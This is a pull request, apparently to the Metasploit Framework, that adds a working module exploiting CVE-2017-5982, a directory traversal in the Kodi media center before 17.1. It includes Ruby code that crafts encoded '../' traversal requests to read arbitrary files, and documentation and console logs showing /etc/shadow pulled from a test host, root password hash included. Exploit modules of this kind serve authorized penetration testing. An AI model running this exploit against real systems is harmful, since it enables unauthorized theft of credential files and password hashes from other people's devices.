### PR TITLE
Add a sploit for CVE-2017-5982

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/kodi_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md
@@ -1,17 +1,18 @@
 ## Vulnerable Application
 
-This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.
+This module exploits an arbitrary file disclosure vulnerability in Kodi before 17.1.
 
 **Vulnerable Application Installation Steps**
 
 Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
-you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).
+you're lazy, like the [one for the Rpi2](http://releases.libreelec.tv/LibreELEC-RPi2.arm-7.0.3.img.gz),
+or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).
 
-You'll need a version lower than 17.1.
+You'll need a version lower than 17.1 of Kodi.
 
 ## Verification Steps
 
-A successful check of the exploit will look like this:
+A successful run of the exploit will look like this:
 
 ```
 msf > use auxiliary/scanner/http/kodi_traversal
@@ -19,6 +20,8 @@ msf auxiliary(kodi_traversal) > set RPORT 8080
 RPORT => 8080
 msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
 RHOSTS => 192.168.0.31
+msf auxiliary(kodi_traversal) > set FILE /etc/shadow
+FILE => /etc/shadow
 msf auxiliary(kodi_traversal) > run
 
 [*] Reading '/etc/shadow'
@@ -35,6 +38,4 @@ dbus:*:::::::
 system:*:::::::
 sshd:*:::::::
 avahi:*:::::::
-msf auxiliary(kodi_traversal) > info 
-
 ```

--- a/documentation/modules/auxiliary/scanner/http/kodi_traversal.md
+++ b/documentation/modules/auxiliary/scanner/http/kodi_traversal.md
@@ -1,0 +1,40 @@
+## Vulnerable Application
+
+This module exploits an arbitrary file disclosure vulnerability in Kodi 17.1.
+
+**Vulnerable Application Installation Steps**
+
+Grab whatever image from [libreelec](https://libreelec.tv/downloads/) if
+you're lazy, or [install kodi from scratch](http://kodi.wiki/view/HOW-TO:Install_Kodi_for_Linux).
+
+You'll need a version lower than 17.1.
+
+## Verification Steps
+
+A successful check of the exploit will look like this:
+
+```
+msf > use auxiliary/scanner/http/kodi_traversal
+msf auxiliary(kodi_traversal) > set RPORT 8080
+RPORT => 8080
+msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
+RHOSTS => 192.168.0.31
+msf auxiliary(kodi_traversal) > run
+
+[*] Reading '/etc/shadow'
+[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin'
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf auxiliary(kodi_traversal) > cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
+[*] exec: cat /home/jvoisin/.msf4/loot/20170219214657_default_192.168.0.31_kodi_114009.bin
+
+systemd-network:*:::::::
+root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
+nobody:*:::::::
+dbus:*:::::::
+system:*:::::::
+sshd:*:::::::
+avahi:*:::::::
+msf auxiliary(kodi_traversal) > info 
+
+```

--- a/modules/auxiliary/scanner/http/kodi_traversal.rb
+++ b/modules/auxiliary/scanner/http/kodi_traversal.rb
@@ -13,9 +13,9 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize(info = {})
     super(update_info(info,
-      'Name'           => 'Kodi 17.1 Local File Inclusion Vulnerability',
+      'Name'           => 'Kodi 17.0 Local File Inclusion Vulnerability',
       'Description'    => %q{
-        This module exploits a directory traversal flaw found in Kodi 17.1.
+        This module exploits a directory traversal flaw found in Kodi before 17.1.
       },
       'References'     =>
         [
@@ -33,7 +33,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
-        OptString.new('FILE',      [true, 'The file to obtain', '/etc/shadow']),
+        OptString.new('FILE',      [true, 'The file to obtain', '/etc/passwd']),
         OptInt.new('DEPTH',        [true, 'The max traversal depth to root directory', 10])
       ], self.class)
   end
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
       print_good("#{fname} stored as '#{p}'")
 
     else
-      print_error("Fail to obtain file for some unknown reason")
+      print_error('Fail to obtain file for some unknown reason')
     end
   end
 

--- a/modules/auxiliary/scanner/http/kodi_traversal.rb
+++ b/modules/auxiliary/scanner/http/kodi_traversal.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Kodi 17.1 Local File Inclusion Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal flaw found in Kodi 17.1.
+      },
+      'References'     =>
+        [
+          ['CVE', '2017-5982'],
+        ],
+      'Author'         =>
+        [
+          'Eric Flokstra',  #Original
+          'jvoisin'
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Feb 12 2017"
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The URI path to the web application', '/']),
+        OptString.new('FILE',      [true, 'The file to obtain', '/etc/shadow']),
+        OptInt.new('DEPTH',        [true, 'The max traversal depth to root directory', 10])
+      ], self.class)
+  end
+
+
+  def run_host(ip)
+    base = normalize_uri(target_uri.path)
+
+    peer = "#{ip}:#{rport}"
+
+    print_status("Reading '#{datastore['FILE']}'")
+
+    traverse = '../' * datastore['DEPTH']
+    f = datastore['FILE']
+    f = f[1, f.length] if f =~ /^\//
+    f = "image/image://" + Rex::Text.uri_encode(traverse + f, "hex-all")
+
+    uri = normalize_uri(base, Rex::Text.uri_encode(f, "hex-all"))
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri'    => uri
+    })
+
+    if res and res.code != 200
+      print_error("Unable to read '#{datastore['FILE']}', possibily because:")
+      print_error("\t1. File does not exist.")
+      print_error("\t2. No permission.")
+
+    elsif res and res.code == 200
+      data = res.body.lstrip
+      fname = datastore['FILE']
+      p = store_loot(
+        'kodi',
+        'application/octet-stream',
+        ip,
+        data,
+        fname
+      )
+
+      vprint_line(data)
+      print_good("#{fname} stored as '#{p}'")
+
+    else
+      print_error("Fail to obtain file for some unknown reason")
+    end
+  end
+
+end


### PR DESCRIPTION
This PR implements a module for [CVE-2017-5982]( https://packetstormsecurity.com/files/141043/Kodi-17.1-Arbitrary-File-Disclosure.html ) for the [kodi mediacenter](http://kodi.tv), loosely based on [`auxiliary/scanner/http/clansphere_traversal`]( https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/http/clansphere_traversal.rb ).

## Verification

List the steps needed to make sure this thing works

- [ ] Get a working [kodi](http://kodi.tv) setup. I used [libreelec]( https://libreelec.tv/ ) since ~~I'm lazy~~ it just works™
- [ ] Start `msfconsole`
- [ ] `use use auxiliary/scanner/http/kodi_traversal`
- [ ] Set `RPORT` and `RHOST`
- [ ] `run`
- [ ] **Verify** that you get the file you requested


## Complete run

```
msf > use auxiliary/scanner/http/kodi_traversal
msf auxiliary(kodi_traversal) > info 

       Name: Kodi 17.1 Local File Inclusion Vulnerability
     Module: auxiliary/scanner/http/kodi_traversal
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2017-02-12

Provided by:
  Eric Flokstra
  jvoisin

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      10               yes       The max traversal depth to root directory
  FILE       /etc/shadow      yes       The file to obtain
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS     192.168.0.31     yes       The target address range or CIDR identifier
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                yes       The URI path to the web application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal flaw found in Kodi 17.1.

References:
  https://cvedetails.com/cve/CVE-2017-5982/

msf auxiliary(kodi_traversal) > show options 

Module options (auxiliary/scanner/http/kodi_traversal):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   FILE       /etc/shadow      yes       The file to obtain
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to the web application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(kodi_traversal) > set RPORT 8080
RPORT => 8080
msf auxiliary(kodi_traversal) > set RHOSTS 192.168.0.31
RHOSTS => 192.168.0.31
msf auxiliary(kodi_traversal) > run

[*] Reading '/etc/shadow'
[+] /etc/shadow stored as '/home/jvoisin/.msf4/loot/20170219213028_default_192.168.0.31_kodi_812537.bin'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf >  cat /home/jvoisin/.msf4/loot/20170219213100_default_192.168.0.31_kodi_464790.bin
[*] exec:  cat /home/jvoisin/.msf4/loot/20170219213100_default_192.168.0.31_kodi_464790.bin

systemd-network:*:::::::
root:$6$ktSJvEl/p.r7nsR6$.EZhW6/TPiY.7qz.ymYSreJtHcufASE4ykx7osCfBlDXiEKqXoxltsX5fE0mY.494pJOKyuM50QfpLpNKvAPC.:::::::
nobody:*:::::::
dbus:*:::::::
system:*:::::::
sshd:*:::::::
avahi:*:::::::
msf > 
```